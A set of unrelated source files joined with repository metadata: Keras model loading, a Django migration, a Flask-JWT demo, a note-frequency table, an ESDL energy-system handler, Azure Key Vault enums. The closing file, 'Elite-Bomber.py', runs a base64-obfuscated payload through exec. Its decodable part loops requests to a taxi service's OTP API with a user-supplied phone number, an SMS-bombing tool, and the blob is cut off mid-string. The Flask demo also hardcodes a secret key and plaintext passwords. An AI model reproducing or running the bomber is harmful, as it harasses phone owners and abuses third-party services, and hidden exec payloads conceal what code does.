print('The model path: ', config['saved_models_dir'] +'/'+config['exp_name']+ '/' + config['model'] + '/' + dataset + '.h5')
model.load_weights(config['saved_models_dir'] +'/'+ config['exp_name']+'/' + config['model'] + '/' + dataset + '.h5')
else:
        # Load the full model without knowing its structure,
        # registering custom layers via custom_objects when configured
if config['model'] is None:
config['model'] = 'custom_model'
if config['custom_layer'] is None:
model = load_model(config['saved_premodels_path'], compile=False)
else:
if isinstance(config['custom_layer'], str): config['custom_layer'] = [config['custom_layer']]
custom_object = dict()
for obj in config['custom_layer']:
layer = getattr(Premodel_Custom_Class, obj)
custom_object[obj] = layer
model = load_model(config['saved_premodels_path'], custom_objects=custom_object, compile=False)
if compile:
in_ = model.get_layer(name='input_X')
out = model.get_layer(name='output_Y')
if config['feed_pos']:
in_pos = model.get_layer(name='input_position')
model, _ = create_and_compile_model([in_, in_pos], out, config, premodel=model)
else:
model, _ = create_and_compile_model(in_, out, config, premodel=model)
return model
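# Hypothetical minimal config sketch (keys inferred from the branches above;
# the real schema lives elsewhere in this project):
# config = {
#     'load_weights_only': True,
#     'model': 'premodel_xyz',   # any name containing 'premodel' takes the Premodel_Set branch
#     'saved_premodels_path': 'weights.h5',
#     'custom_layer': None,
#     'feed_pos': False,
# }
# model = load_model_file(config, dataset='task1', compile=False)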
|
[
"thomas.kuestner@uni-tuebingen.de"
] |
thomas.kuestner@uni-tuebingen.de
|
168b6d18f1582998e07f62bd36f0ff9b02258b4d
|
cb11ce1fe40a24e87ceb0066e10f5cdf908c5c8f
|
/neighbourhood/migrations/0004_auto_20190708_1010.py
|
55f9cea6a605a4e8064225f721f570d8f8f97b4d
|
[
"MIT"
] |
permissive
|
maurinesinami/neighbourhood
|
003d0774dae55b292109da9f6033743598443011
|
b6b2562ff0db9dce522f8f7c7056a07b52181b7d
|
refs/heads/master
| 2021-09-09T06:22:25.412397
| 2019-07-10T04:31:29
| 2019-07-10T04:31:29
| 195,639,243
| 0
| 0
| null | 2021-09-08T01:07:56
| 2019-07-07T10:42:07
|
Python
|
UTF-8
|
Python
| false
| false
| 1,217
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2019-07-08 07:10
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('neighbourhood', '0003_business'),
]
operations = [
migrations.AlterField(
model_name='business',
name='bn_community',
field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to='neighbourhood.Community'),
preserve_default=False,
),
migrations.AlterField(
model_name='business',
name='bn_user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='post',
name='img',
field=models.ImageField(blank=True, default=0, upload_to='posts/'),
preserve_default=False,
),
migrations.AlterField(
model_name='post',
name='text',
field=models.CharField(max_length=500),
),
]
|
[
"maurinenami"
] |
maurinenami
|
3685cfbf63e35434703fc37cb0fccc72c970fbc5
|
8377cfd463e2d2361f1e9f347b0513ed8558eff4
|
/PythonPlay/flask-jwt-master/flask_JWT_study.py
|
0179da4c91499012e0f080e4a027f99cdaa366cc
|
[
"MIT"
] |
permissive
|
ZHLOVE/PersonalDemoGroup
|
a6fbf237c26315b8b77fca857284a06c1979c9cf
|
9db291f4a44da0656d0b11c082b8e79632a76eb4
|
refs/heads/master
| 2021-01-23T15:16:34.505524
| 2017-09-06T06:54:41
| 2017-09-06T06:54:41
| 102,700,421
| 1
| 0
| null | 2017-09-07T06:33:22
| 2017-09-07T06:33:21
| null |
UTF-8
|
Python
| false
| false
| 1,108
|
py
|
from flask import Flask
from flask_jwt import JWT, jwt_required, current_identity
from werkzeug.security import safe_str_cmp
class User(object):
def __init__(self, id, username, password):
self.id = id
self.username = username
self.password = password
def __str__(self):
return "User(id='%s')" % self.id
users = [
User(1,'mql','mql'),
User(2,'gcy','gcy'),
]
username_table = {u.username: u for u in users}
userid_table = {u.id: u for u in users}
def authenticate(username, password):
user = username_table.get(username, None)
if user and safe_str_cmp(user.password.encode('utf-8'),password.encode('utf-8')):
return user
def identity(payload):
user_id = payload['identity']
return userid_table.get(user_id, None)
app = Flask(__name__)
app.debug = True
app.config['SECRET_KEY'] = 'super-secret'
jwt = JWT(app, authenticate, identity)
@app.route('/protected')
@jwt_required()
def protected():
return '%s' % current_identity
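# Typical flow with Flask-JWT's defaults (auth endpoint '/auth', header
# prefix 'JWT'):
#   POST /auth with {"username": "mql", "password": "mql"} -> {"access_token": ...}
#   GET /protected with header "Authorization: JWT <access_token>" -> User(id='1')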
if __name__ == '__main__':
    print('start')
app.run()
#end
|
[
"301063915@qq.com"
] |
301063915@qq.com
|
b27fc0673fd407edc7a1d6c38fa52398cb7fd3b0
|
4bf380ed05bea3676dd54573bfd61d71dafcef7a
|
/violinHelper/Sound/FreqTable.py
|
23d5f4e16b12d5180ae0b0d118d3865500d9f271
|
[] |
no_license
|
thusimon/Lutos
|
6d58bc80230607933cf29f9543bff218c1cf0e21
|
b0b372f5de8325231fc5e5e11e8f0f57392df887
|
refs/heads/master
| 2021-01-02T22:49:10.852578
| 2018-08-02T05:35:44
| 2018-08-02T05:35:44
| 99,402,338
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,113
|
py
|
class FreqTable:
def __init__(self):
self.freqTable = dict()
self.freqTable["g3"] = 196
self.freqTable["g3#"] = 208
self.freqTable["a3"] = 220
self.freqTable["a3#"] = 233
self.freqTable["b3"] = 245
self.freqTable["c4"] = 262
self.freqTable["c4#"] = 277
self.freqTable["d4"] = 294
self.freqTable["d4#"] = 311
self.freqTable["e4"] = 330
self.freqTable["f4"] = 349 # half key 19
self.freqTable["f4#"] = 370
self.freqTable["g4"] = 392
self.freqTable["g4#"] = 415
self.freqTable["a4"] = 440
self.freqTable["a4#"] = 466
self.freqTable["b4"] = 494
self.freqTable["c5"] = 523
self.freqTable["c5#"] = 554
self.freqTable["d5"] = 587
self.freqTable["d5#"] = 622
self.freqTable["e5"] = 659
self.freqTable["f5"] = 698
self.freqTable["f5#"] = 740
self.freqTable["g5"] = 784
self.freqTable["g5#"] = 830
self.freqTable["a5"] = 880
self.freqTable["a5#"] = 932
self.freqTable["b5"] = 988
|
[
"thusimon@gmail.com"
] |
thusimon@gmail.com
|
5f7d0a63465078de1873b526e0c6c52e900c6779
|
25954758ded6a560b266bfda69632f74a39e9d9e
|
/EnergySystemHandler.py
|
a7801dea6dc17393f9ba30f6b9d78080317523d1
|
[] |
no_license
|
redekok/startanalyse-esdl
|
3a2ce784a731782fba0cecc63348457c1b8d8489
|
070316b580881d4f7fe329dea3e6d35abaeea1fb
|
refs/heads/master
| 2020-08-01T15:09:24.031908
| 2019-09-26T07:42:38
| 2019-09-26T07:42:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,853
|
py
|
from time import sleep
from pyecore.resources import ResourceSet, URI
from pyecore.utils import DynamicEPackage, alias
from pyecore.resources.resource import HttpURI
from xmlresource import XMLResource
from pyecore.notification import EObserver
import uuid
from io import BytesIO
class EnergySystemHandler:
"""Class to handle (load, read, and update) an ESDL Energy System"""
def __init__(self, name):
self.name = name
self.es, self.resource, self.esdl, self.rset = self.load_energy_system(name)
# print('\nEnergy system \"{}\" is loaded!'.format(name))
# Creates a dict of all the attributes of an ESDL object
@staticmethod
def attr_to_dict(esdl_object):
d = dict()
d['esdlType'] = esdl_object.eClass.name
for attr in dir(esdl_object):
attr_value = esdl_object.eGet(attr)
if attr_value is not None:
d[attr] = attr_value
return d
# Creates a uuid: useful for generating unique IDs
@staticmethod
def generate_uuid():
return str(uuid.uuid4())
def load_energy_system(self, name):
# create a resourceSet that hold the contents of the esdl.ecore model and the instances we use/create
rset = ResourceSet()
# Assign files with the .esdl extension to the XMLResource instead of default XMI
rset.resource_factory['esdl'] = lambda uri: XMLResource(uri)
        # Read the latest esdl.ecore from GitHub
esdl_model_resource = rset.get_resource(HttpURI('https://raw.githubusercontent.com/EnergyTransition/ESDL/master/esdl/model/esdl.ecore'))
esdl_model = esdl_model_resource.contents[0]
# print('Namespace: {}'.format(esdl_model.nsURI))
rset.metamodel_registry[esdl_model.nsURI] = esdl_model
# Create a dynamic model from the loaded esdl.ecore model, which we can use to build Energy Systems
esdl = DynamicEPackage(esdl_model)
# fix python buildin 'from' that is also used in ProfileElement as attribute
# use 'start' instead of 'from' when using a ProfileElement
alias('start', esdl.ProfileElement.findEStructuralFeature('from'))
# have a nice __repr__ for some ESDL classes when printing ESDL objects (includes all Assets and EnergyAssets)
esdl.Item.python_class.__repr__ = lambda x: '{}: ({})'.format(x.name, EnergySystemHandler.attr_to_dict(x))
esdl.Carrier.python_class.__repr__ = lambda x: '{}: ({})'.format(x.name, EnergySystemHandler.attr_to_dict(x))
esdl.Geometry.python_class.__repr__ = lambda x: '{}: ({})'.format(x.name, EnergySystemHandler.attr_to_dict(x))
esdl.QuantityAndUnitType.python_class.__repr__ = lambda x: '{}: ({})'.format(x.id, EnergySystemHandler.attr_to_dict(x))
esdl.QuantityAndUnitReference.python_class.__repr__ = lambda x: '{}: ({})'.format('QuantityAndUnitReference', EnergySystemHandler.attr_to_dict(x))
esdl.KPI.python_class.__repr__ = lambda x: '{}: ({})'.format(x.name, EnergySystemHandler.attr_to_dict(x))
esdl.ProfileElement.python_class.__repr__ = lambda x: 'ProfileElement ({})'.format(EnergySystemHandler.attr_to_dict(x))
# load the ESDL file
resource = rset.get_resource(URI(name))
es = resource.contents[0]
# At this point, the model instance is loaded!
# get notifications of changes in the EnergySystem model
#observer = PrintNotification(es)
#observer2 = PrintNotification(es.instance[0].area)
        # also return the esdl and rset references, so we can create esdl classes and store them as strings
return es, resource, esdl, rset
# Add Energy System Information
def add_energy_system_information(self):
esi = self.esdl.EnergySystemInformation(id='energy_system_information')
self.es.energySystemInformation = esi
def add_data_source(self, name, description):
data_source = self.esdl.DataSource(id='data_source', name=name, description=description)
self.es.dataSource = data_source
# Add energy system information to the energy system if it is not there yet
# Energy System information can be used to globally define the quantity and units of this system,
# instead of defining them manually per KPI in each area: this fosters reuse (but is not necessary)
def get_quantity_and_units(self):
q_and_u = None
if self.get_by_id('energy_system_information') is None:
self.add_energy_system_information()
q_and_u = self.esdl.QuantityAndUnits(id='quantity_and_units')
self.es.energySystemInformation.quantityAndUnits = q_and_u
else:
q_and_u = self.get_by_id('quantity_and_units')
return q_and_u
# Add KPIs object to Energy System
def add_kpis(self):
# create new KPIs object
kpis = self.esdl.KPIs(id='kpis', description='KPIs')
self.es.instance[0].area.KPIs = kpis
# Add KPI to KPIs object
def add_kpi(self, kpi):
self.es.instance[0].area.KPIs.kpi.append(kpi)
    # Get a list of assets of a specific ESDL type, searched in the given
    # area, or in the main instance's area when no area is passed
    def get_assets_of_type(self, esdl_type, area=None):
        if area is None:
            area = self.es.instance[0].area
        assets = []
        for current_asset in area.asset:
            if isinstance(current_asset, esdl_type):
                assets.append(current_asset)
        return assets
# Get a list of potentials of a specific ESDL type in the main instance's area
def get_potentials_of_type(self, esdl_type):
potentials = []
for current_potential in self.es.instance[0].area.potential:
if isinstance(current_potential, esdl_type):
potentials.append(current_potential)
return potentials
# returns a generator of all assets of a specific type. Not only the ones defined in the main Instance's Area
# e.g. QuantityAndUnits can be defined in the KPI of an Area or in the EnergySystemInformation object
# this function returns all of them at once
def get_all_assets_of_type(self, esdl_type):
return esdl_type.allInstances()
# Using this function you can query for objects by ID
    # After loading an ESDL-file, all objects that have an ID defined are stored in resource.uuid_dict automatically
# Note: If you add things later to the resource, it won't be added automatically to this dictionary though.
# Use get_by_id_slow() for that
def get_by_id(self, id):
if id in self.resource.uuid_dict:
return self.resource.uuid_dict[id]
else:
return None
# This function iterates over all the contents of the Energy System and is much slower than get_by_id()
def get_by_id_slow(self, id):
for child in self.es.eAllContents():
if hasattr(child, 'id'):
if child.id == id:
return child
    # create a readable list of a given attribute of an ESDL class, scoped
    # to the given area, or to the main instance's area when none is passed
    def get_asset_attribute(self, esdl_type, attribute, area=None):
        if area is None:
            area = self.es.instance[0].area
        asset_data = []
        for current_asset in area.asset:
            if isinstance(current_asset, esdl_type):
                asset_data.append({
                    'name': current_asset.name,  # name
                    'attribute': {
                        'key': attribute,
                        'value': getattr(current_asset, attribute)
                    }
                })
        return asset_data
# returns a specific KPI by id, see also get_by_id for a faster method
def get_kpi_by_id(self, id):
for kpi in self.es.instance[0].area.KPIs.kpi:
if kpi.id == id:
return kpi
# returns a specific KPI by name
def get_kpi_by_name(self, name):
for kpi in self.es.instance[0].area.KPIs.kpi:
if kpi.name == name:
return kpi
# save the resource
def save(self, filename):
uri = URI(filename)
fileresource = self.rset.create_resource(uri)
# add the current energy system
fileresource.append(self.es)
# save the resource
fileresource.save()
# get the energy system as a XML String
# does not change the 'active' resource
# so save() will still save as a file
def get_as_string(self):
# to use strings as resources, we simulate a string as being a file
uri = StringURI('anyname.esdl')
# create the string resource
#stringresource = self.rset.create_resource(uri)
# add the current energy system
#stringresource.append(self.es)
# save the resource
self.resource.save(uri)
# remove the temporary resource in the resource set
#self.rset.remove_resource(stringresource)
# return the string
return uri.getvalue()
# load an EnergySystem from a string (using UTF-8 encoding)
def load_from_string(self, string):
uri = StringURI('loadfromstring', string)
# this overrides the current loaded resource
self.resource = self.rset.create_resource(uri)
self.resource.load()
self.es = self.resource.contents[0]
return self.es
class PrintNotification(EObserver):
def __init__(self, notifier=None):
super().__init__(notifier=notifier)
def notifyChanged(self, notification):
print('Notification: {}'.format(notification))
class StringURI(URI):
def __init__(self, uri, text=None):
super(StringURI, self).__init__(uri)
if text is not None:
self.__stream = BytesIO(text.encode('UTF-8'))
def getvalue(self):
readbytes = self.__stream.getvalue()
# somehow stringIO does not work, so we use BytesIO
string = readbytes.decode('UTF-8')
return string
def create_instream(self):
return self.__stream
def create_outstream(self):
self.__stream = BytesIO()
return self.__stream
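# Minimal usage sketch (assumes an ESDL file such as 'example.esdl' exists):
# esh = EnergySystemHandler('example.esdl')
# heat_pumps = esh.get_all_assets_of_type(esh.esdl.HeatPump)
# xml_string = esh.get_as_string()
# esh.save('copy.esdl')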
|
[
"roos.dekok@quintel.com"
] |
roos.dekok@quintel.com
|
ec7d8801eb56e020fb0729328407ae930c6a369e
|
221be51c2ef661a717e7f4740c25e6247c7f2794
|
/0x0A-python-inheritance/0-lookup.py
|
cd819065692d2e44cfd8d7d23aaa0d9abe825d76
|
[] |
no_license
|
Teslothorcha/holbertonschool-higher_level_programming
|
8bc562bf872554dfb5074562dae719663e983722
|
0464d980b45e3164c470dced81192d6ccc926ff7
|
refs/heads/master
| 2020-07-23T00:49:43.809183
| 2020-02-13T21:45:18
| 2020-02-13T21:45:18
| 207,387,971
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 209
|
py
|
#!/usr/bin/python3
"""
This function will
show the attributes and
methods of an object
"""
def lookup(obj):
"""
    obj is the instance to be evaluated
    """
    return dir(obj)
|
[
"juandavidmarinbernal@gmail.com"
] |
juandavidmarinbernal@gmail.com
|
c2a502a083d53447c9a984a29cbc9702459721c9
|
847233f9b8b837b5c95c63d66b1a42d513444267
|
/Homework3/Homework3-2/ReadData.py
|
f0da6742329a4810ee2531adfa80077d4cd90dd7
|
[] |
no_license
|
bao-bao/DataMining
|
0099da967e0fde93e8ae0d0727b61f1d88990c6d
|
91970aaf8cd1d9c16e55db29ea2f22966c1deead
|
refs/heads/master
| 2020-05-24T19:42:01.306665
| 2017-06-19T19:57:07
| 2017-06-19T19:57:07
| 84,875,016
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 752
|
py
|
"""
Created by AMXPC on 2017/4/27.
"""
import pandas as pd
def readcsv_notime(x):
dataframe = pd.read_csv(x)
dic = dict()
for index, row in dataframe.iterrows():
if row[1] not in dic:
dic[row[1]] = []
if row[47] not in dic[row[1]]:
dic[row[1]].append(row[47])
# print dic
return dic
def readcsv_withtime(x):
dataframe = pd.read_csv(x)
dic = dict()
time = ''
for index, row in dataframe.iterrows():
if row[1] not in dic:
dic[row[1]] = []
if row[0] != time:
dic[row[1]].append([])
if row[47] not in dic[row[1]][-1]:
dic[row[1]][-1].append(str(row[47]))
time = row[0]
# print dic
return dic
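# Return shapes, as inferred from the loops above (the meaning of columns 1
# and 47 is dataset-specific and undocumented here):
#   readcsv_notime   -> {row[1]: [unique row[47] values]}
#   readcsv_withtime -> {row[1]: [[values within one row[0] timestamp], ...]}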
|
[
"1452765@tongji.edu.cn"
] |
1452765@tongji.edu.cn
|
9110b0f1aaee562bca123db9c057b18564d4574b
|
fca45d0b019591bee60506b34f3efe6c83d3d2e7
|
/learn/模块/wk_08_模块的搜索顺序.py
|
57a12fce54f536a3aac7f000deec7ef9eb1ef252
|
[] |
no_license
|
xiebohust/python_study
|
a064ccd1c2fcf88b89ffe6eba1e67a910b90941d
|
43c9c21c0957725fd68db2c9dc296be145816b7a
|
refs/heads/master
| 2020-04-17T14:43:42.608303
| 2019-01-22T11:36:41
| 2019-01-22T11:36:41
| 166,669,118
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 92
|
py
|
import random
rand = random.randint(0, 10)
print(rand)
print(random.__file__)
|
[
"623270307@qq.com"
] |
623270307@qq.com
|
d79b62eac7915e330f408e3821843222f83295f6
|
d7016f69993570a1c55974582cda899ff70907ec
|
/sdk/keyvault/azure-keyvault-administration/azure/keyvault/administration/_generated/v7_4_preview_1/models/_key_vault_client_enums.py
|
2a5527ff22fa10564ce52b1980eeb181bcf14611
|
[
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] |
permissive
|
kurtzeborn/azure-sdk-for-python
|
51ca636ad26ca51bc0c9e6865332781787e6f882
|
b23e71b289c71f179b9cf9b8c75b1922833a542a
|
refs/heads/main
| 2023-03-21T14:19:50.299852
| 2023-02-15T13:30:47
| 2023-02-15T13:30:47
| 157,927,277
| 0
| 0
|
MIT
| 2022-07-19T08:05:23
| 2018-11-16T22:15:30
|
Python
|
UTF-8
|
Python
| false
| false
| 5,259
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from enum import Enum
from azure.core import CaseInsensitiveEnumMeta
class DataAction(str, Enum, metaclass=CaseInsensitiveEnumMeta):
"""Supported permissions for data actions."""
#: Read HSM key metadata.
READ_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/read/action"
#: Update an HSM key.
WRITE_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/write/action"
#: Read deleted HSM key.
READ_DELETED_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/deletedKeys/read/action"
#: Recover deleted HSM key.
RECOVER_DELETED_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/deletedKeys/recover/action"
#: Backup HSM keys.
BACKUP_HSM_KEYS = "Microsoft.KeyVault/managedHsm/keys/backup/action"
#: Restore HSM keys.
RESTORE_HSM_KEYS = "Microsoft.KeyVault/managedHsm/keys/restore/action"
#: Delete role assignment.
DELETE_ROLE_ASSIGNMENT = "Microsoft.KeyVault/managedHsm/roleAssignments/delete/action"
#: Get role assignment.
GET_ROLE_ASSIGNMENT = "Microsoft.KeyVault/managedHsm/roleAssignments/read/action"
#: Create or update role assignment.
WRITE_ROLE_ASSIGNMENT = "Microsoft.KeyVault/managedHsm/roleAssignments/write/action"
#: Get role definition.
READ_ROLE_DEFINITION = "Microsoft.KeyVault/managedHsm/roleDefinitions/read/action"
#: Create or update role definition.
WRITE_ROLE_DEFINITION = "Microsoft.KeyVault/managedHsm/roleDefinitions/write/action"
#: Delete role definition.
DELETE_ROLE_DEFINITION = "Microsoft.KeyVault/managedHsm/roleDefinitions/delete/action"
#: Encrypt using an HSM key.
ENCRYPT_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/encrypt/action"
#: Decrypt using an HSM key.
DECRYPT_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/decrypt/action"
#: Wrap using an HSM key.
WRAP_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/wrap/action"
#: Unwrap using an HSM key.
UNWRAP_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/unwrap/action"
#: Sign using an HSM key.
SIGN_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/sign/action"
#: Verify using an HSM key.
VERIFY_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/verify/action"
#: Create an HSM key.
CREATE_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/create"
#: Delete an HSM key.
DELETE_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/delete"
#: Export an HSM key.
EXPORT_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/export/action"
#: Release an HSM key using Secure Key Release.
RELEASE_KEY = "Microsoft.KeyVault/managedHsm/keys/release/action"
#: Import an HSM key.
IMPORT_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/import/action"
#: Purge a deleted HSM key.
PURGE_DELETED_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/deletedKeys/delete"
#: Download an HSM security domain.
DOWNLOAD_HSM_SECURITY_DOMAIN = "Microsoft.KeyVault/managedHsm/securitydomain/download/action"
#: Check status of HSM security domain download.
DOWNLOAD_HSM_SECURITY_DOMAIN_STATUS = "Microsoft.KeyVault/managedHsm/securitydomain/download/read"
#: Upload an HSM security domain.
UPLOAD_HSM_SECURITY_DOMAIN = "Microsoft.KeyVault/managedHsm/securitydomain/upload/action"
#: Check the status of the HSM security domain exchange file.
READ_HSM_SECURITY_DOMAIN_STATUS = "Microsoft.KeyVault/managedHsm/securitydomain/upload/read"
#: Download an HSM security domain transfer key.
READ_HSM_SECURITY_DOMAIN_TRANSFER_KEY = "Microsoft.KeyVault/managedHsm/securitydomain/transferkey/read"
#: Start an HSM backup.
START_HSM_BACKUP = "Microsoft.KeyVault/managedHsm/backup/start/action"
#: Start an HSM restore.
START_HSM_RESTORE = "Microsoft.KeyVault/managedHsm/restore/start/action"
#: Read an HSM backup status.
READ_HSM_BACKUP_STATUS = "Microsoft.KeyVault/managedHsm/backup/status/action"
#: Read an HSM restore status.
READ_HSM_RESTORE_STATUS = "Microsoft.KeyVault/managedHsm/restore/status/action"
#: Generate random numbers.
RANDOM_NUMBERS_GENERATE = "Microsoft.KeyVault/managedHsm/rng/action"
class RoleDefinitionType(str, Enum, metaclass=CaseInsensitiveEnumMeta):
"""The role definition type."""
MICROSOFT_AUTHORIZATION_ROLE_DEFINITIONS = "Microsoft.Authorization/roleDefinitions"
class RoleScope(str, Enum, metaclass=CaseInsensitiveEnumMeta):
"""The role scope."""
#: Global scope
GLOBAL = "/"
#: Keys scope
KEYS = "/keys"
class RoleType(str, Enum, metaclass=CaseInsensitiveEnumMeta):
"""The role type."""
#: Built in role.
BUILT_IN_ROLE = "AKVBuiltInRole"
#: Custom role.
CUSTOM_ROLE = "CustomRole"
class SettingTypeEnum(str, Enum, metaclass=CaseInsensitiveEnumMeta):
"""The type specifier of the value."""
BOOLEAN = "boolean"
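# Illustrative note (not part of the generated file): because these enums use
# azure.core's CaseInsensitiveEnumMeta, member lookup by name is
# case-insensitive, so DataAction["read_hsm_key"] and DataAction["READ_HSM_KEY"]
# resolve to the same member; and since each enum also subclasses str, a member
# compares equal to its wire value:
#     DataAction.READ_HSM_KEY == "Microsoft.KeyVault/managedHsm/keys/read/action"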
|
[
"noreply@github.com"
] |
kurtzeborn.noreply@github.com
|
ac91c2db1ba24f2cb5f837094d410a4de6971e15
|
dbf3509d667dd72e1f80a967d8e08d7c03da5201
|
/Elite-Bomber.py
|
a4bec44815735ef65203ac5e1a22ffeaefa4c715
|
[] |
no_license
|
TERMUX20210/EliteBomber-1
|
e3f3bafd5fdd503628a1212480e3836d3f130c5b
|
86a6b26af8453f21139aa38c8afd27875097e67a
|
refs/heads/main
| 2023-03-29T07:52:17.833651
| 2021-03-30T21:12:59
| 2021-03-30T21:12:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,250
|
py
|
import base64
exec(base64.b64decode('''aW1wb3J0IGJhc2U2NAp4PSgiYVcxd2IzSjBJSEpsY1hWbGMzUnpDbWx0Y0c5eWRDQnZjd3B5WldR
OUoxd3dNek5iTXpGdEp3cG5jbVZsYmowblhEQXpNMXN6TW0wbkNtSnNkV1U5SjF3d016TmJNelp0
Sndwd2FXNXJQU2RjTURNeld6TTFiU2NLY21GdVp6MG5YREF6TTFzek5HMG5DbXhwYm1zZ1BTQWlh
SFIwY0hNNkx5OWhjSEF1YzI1aGNIQXVkR0Y0YVM5aGNHa3ZZWEJwTFhCaGMzTmxibWRsY2kxdllY
VjBhQzkyTWk5dmRIQWlDbTl6TG5ONWMzUmxiU2dpWm05eUlHa2dhVzRnZXpFdUxqRXlmVHNnWkc4
Z1ptOXlJR29nYVc0Z0pDaHpaWEVnTVNBa2FTazdJR1J2SUdWamFHOGdMVzVsSUNScHc0UGlnSlFr
YWowa0tDaHBLbW9wS1Z4Y2REdGtiMjVsT3lCbFkyaHZPMlJ2Ym1VaUtRcHZjeTV6ZVhOMFpXMG9J
bU5zWldGeUlpa0tjSEpwYm5Rb1ppSjdjbVZrZlNBaUtRcHdjbWx1ZENnaUlDQWdJQ0FnSUNBc0lD
QWdJQ0JjSUNBZ0lDOGdJQ0FnSUNBc0lDSXBDbkJ5YVc1MEtDSWdJQ0FnSUNBZ0x5QmNJQ0FnSUNs
Y1gxOHZLQ0FnSUNBZ0x5QmNJQ0lwQ25CeWFXNTBLQ0lnSUNBZ0lDQXZJQ0FnWENBZ0tGOWNJQ0F2
WHlrZ0lDQXZJQ0FnWENBaUtRcHdjbWx1ZENnaUlGOWZYMTh2WDE5ZlgxOWNYMTljUUNBZ1FDOWZY
MTh2WDE5ZlgxOWNYMTlmWHlBaUtRcHdjbWx1ZENnaWZDQWdJQ0FnSUNBZ0lDQWdJQ0I4WEM0dUwz
d2dJQ0FnSUNBZ0lDQWdJQ0FnSUh3Z0lpa0tjSEpwYm5Rb0lud2dJQ0FnSUNBZ0lDQWdJQ0FnSUZ4
V1ZpOGdJQ0FnSUNBZ0lDQWdJQ0FnSUNCOElDSXBDbkJ5YVc1MEtDSjhJQ0FnSUNBZ0lDQlFaWEp6
YVdGdUlFVnNhWFJsSUNCWlZDQWdJQ0FnSUNBZ2ZDQWlLUXB3Y21sdWRDZ2lmRjlmWDE5ZlgxOWZY
MTlmWDE5ZlgxOWZYMTlmWDE5ZlgxOWZYMTlmWDE5Zlgzd2dJaWtLY0hKcGJuUW9JaUI4SUNBZ0lD
OWNJQzhnSUNBZ0lDQmNYQ0FnSUNBZ0lDQWdYQ0F2WENBZ0lDQjhJQ0lwQ25CeWFXNTBLQ0lnZkNB
Z0x5QWdJRllnSUNBZ0lDQWdLU2tnSUNBZ0lDQWdJRllnSUNCY0lDQjhJQ0lwQ25CeWFXNTBLQ0ln
ZkM4Z0lDQWdJTUt3SUNBZ0lDQWdJQzh2SUNBZ0lDQWdJQ0RDc0NBZ0lDQWdYSHdnSWlrS2NISnBi
blFvSWlEQ3NDQWdJQ0FnSUNBZ0lDQWdJQ0FnVmlBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0RDc0NBaUtR
cHdjbWx1ZENobUludHdhVzVyZlNBaUtRcHdjbWx1ZENnaTRvaUd6cURPb002Z3pxRE9vTTZnenFE
T29NNmd6cURPb002Z3pxRE9vTTZnenFET29NNmd6cURPb002Z3pxRE9vTTZnenFET29NNmd6cURP
b002Z3pxRE9vTTZnNG9pR0lpa0tjSEpwYm5Rb1ppSjdZbXgxWlgwZ0lpa0tjSEpwYm5Rb0lsUmxi
R1ZuY21GdElEb2dRRkJsY25OcFlXNWZSV3hwZEdVaUtRcHdjbWx1ZENnaVdXOTFWSFZpWlNBZ09p
QlpiM1ZVZFdKbExtTnZiUzlRWlhKemFXRnVSV3hwZEdVaUtRcHdjbWx1ZENobUludHdhVzVyZlNB
aUtRcHdjbWx1ZENnaTRvaUd6cURPb002Z3pxRE9vTTZnenFET29NNmd6cURPb002Z3pxRE9vTTZn
enFET29NNmd6cURPb002Z3pxRE9vTTZnenFET29NNmd6cURPb002Z3pxRE9vTTZnNG9pR0lpa0tj
SEpwYm5Rb1ppSjdaM0psWlc1OUlDSXBDbkJ5YVc1MEtDSjhNWHhGYkdsMFpVSnZiV0lpS1Fwd2Nt
bHVkQ2dpZkRKOFZHVnpkRTVsZENJcENuQnlhVzUwS0NKOE0zeEZlR2wwSWlrS2NISnBiblFvWmlK
N2NtRnVaMzBnSWlrS1JXeHBkR1VnUFNCcGJuUW9hVzV3ZFhRb0luemlpSVo4WTJodmIzTmxJRHcr
UGlBNklDSXBLUXBwWmlCRmJHbDBaU0E5UFNBeE9nb2dJQ0FnYm5WdFltVnlJRDBnYVc1d2RYUW9J
bkJzWldGelpTQnpaVzVrSUc1MWJXSmxjaUI3T2NPWHc1ZkRsOE9YdzVmRGw4T1hmU0E2SUNJcENp
QWdJQ0IzYUdsc1pTQlVjblZsT2dvZ0lDQWdJQ0FnSUNBZ0lDQWdJSEpsY1hWbGMzUnpMbkJ2YzNR
b2JHbHVheXhrWVhSaFBYc2lZMlZzYkhCb2IyNWxJam9pS3prNElpdHVkVzFpWlhKOUtRb2dJQ0Fn
SUNBZ0lDQWdJQ0FnSUhCeWFXNTBLQ0pUZFdOalpYTnpablZzYkhrZ2MyVnVaR1ZrSWl3Z2JuVnRZ
